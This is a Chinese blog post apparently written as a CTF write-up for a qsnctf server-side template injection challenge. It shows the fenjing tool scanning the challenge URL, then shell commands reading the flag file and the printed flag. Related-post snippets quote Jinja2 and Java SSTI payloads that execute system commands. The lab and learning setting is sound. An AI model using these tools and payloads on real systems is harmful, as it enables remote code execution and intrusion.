WEB SSTI(qsnctf)

已于 2023-12-07 19:06:20 修改
阅读量753 收藏 11
点赞数 11
分类专栏: ctf web 工具 文章标签: web
于 2023-11-30 14:52:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76718200/article/details/134712490
版权
ctf 同时被 3 个专栏收录
9 篇文章 1 订阅
订阅专栏
web
2 篇文章 0 订阅
订阅专栏
工具
2 篇文章 0 订阅
订阅专栏

1.题目描述

2.解题思路

开启环境访问

看标题发现是SSTI模板注入使用今天刚学的fenjing工具自动化SSTI模板注入

工具下载教程网址:fenjing(焚靖)——jinja2 SSTI一把梭 - yixinBC's blog

使用pip下载

pip install fenjing

python -m fenjing scan --url 'http://xxx/'#目标网址

以下是我已经安装好了

pip install fenjing #安装fenjing工具

进行自动化SSTI注入

python3 -m fenjing scan --url http://81bb8ce6-6182-4515-a721-c458f791dfc6.challenge.qsnctf.com:8081/

ls /

查看根目录下有什么

发现f1ag,查看

cat /f1ag

flag为

qsnctf{bd686e12-ac15-4d05-9c1d-3c19f9c3a629}

重开开挂
关注
  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SSTI模板注入详细总结及WAF绕过_fenjing ssti(1)
m0_61072747的博客
04-08 1083
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
fenjing工具,ssti
12-17
fenjing一把梭哈ssti,简单绕过waf
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 1755
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
[SSTI自动化工具]Fenjing安装说明_fenjing ssti
2401_84969805的博客
05-13 674
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
[SSTI自动化工具]Fenjing安装说明
m0_61155226的博客
07-11 2851
SSTI自动化工具
qsnctf -web 第五届浙江省大学生网络与信息安全竞赛 吃豆人
weixin_68123535的博客
03-30 187
qsnctf-web 第五届浙江省大学生网络与信息安全竞赛 糖豆人WP
qsnctf easy_web wp
arcuied
11-10 600
qsnctf easy_web wp
qsnctf
2301_79678604的博客
12-12 400
下载完安装包后,用kali虚拟机打开,解压之后直接利用strings口令。得到一串 ,之后通过查找flag得到flag。
qsnctf 帝国CMS01 wp
arcuied
11-11 523
qsnctf 帝国CMS01 wp
SSTI
03-09
SSTI
CTF Web各种题目的解题姿势
07-27
第1章 注入类 课时1:SQL注入原理与利用 19'40 课时2:SQL注入宽字节原理与利用42'08 课时3:SQL Union注入原理与利用01'01'54 课时4:SQL注入布尔注入50'02 ... 课时3:8.3-SSTI Trick技巧27'13
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
攻防世界easy_webSSTI注入
m0_66935689的博客
07-29 215
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
【小工具发现系列-1】fenjin(焚靖)
m0_73683234的博客
03-17 1386
之前出了一道常规ssti题目,被人用工具秒了,问人要到之后试了一下,发现确实香(jianjia2的ssti要被秒破了)超长的payload就给打出来了(这是真的香,彻底解放双手+不动脑子)使用scan可以自动的扫描网站,最后反弹一个shell。如果要更详细一点可以查看crack的--help。这里我使用了ssti-lab 的最后的混合过滤。QQ:2912055973 欢迎大家讨论。安装过程有很多,我选择了相对简单的方法。主环境安装焚靖之后,使用方法也很简单。这个小工具就介绍完啦(很香)
qsnctf -- 新手的登录
m0_72054784的博客
04-13 502
qsnctf -- 新手的登入
SSTI入门详解
E1even的博客
03-15 4979
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
基于Python实现的声源定位工程系统源码(优秀课程设计).zip
最新发布
06-23
基于Python实现的声源定位工程源码(优秀课程设计).zip个人大三学期的课程设计、经导师指导并认可通过的高分大作业设计项目,评审分97分。主要针对计算机相关专业的正在做大作业的学生和需要项目实战练习的学习者,可作为课程设计、期末大作业。 基于Python实现的声源定位工程源码(优秀课程设计).zip个人大三学期的课程设计、经导师指导并认可通过的高分大作业设计项目,评审分97分。主要针对计算机相关专业的正在做大作业的学生和需要项目实战练习的学习者,可作为课程设计、期末大作业。 基于Python实现的声源定位工程源码(优秀课程设计).zip个人大三学期的课程设计、经导师指导并认可通过的高分大作业设计项目,评审分97分。主要针对计算机相关专业的正在做大作业的学生和需要项目实战练习的学习者,可作为课程设计、期末大作业。 基于Python实现的声源定位工程源码(优秀课程设计).zip个人大三学期的课程设计、经导师指导并认可通过的高分大作业设计项目,评审分97分。主要针对计算机相关专业的正在做大作业的学生和需要项目实战练习的学习者,可作为课程设计、期末大作业。
buu ctf web进阶]ssti
08-23
在buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值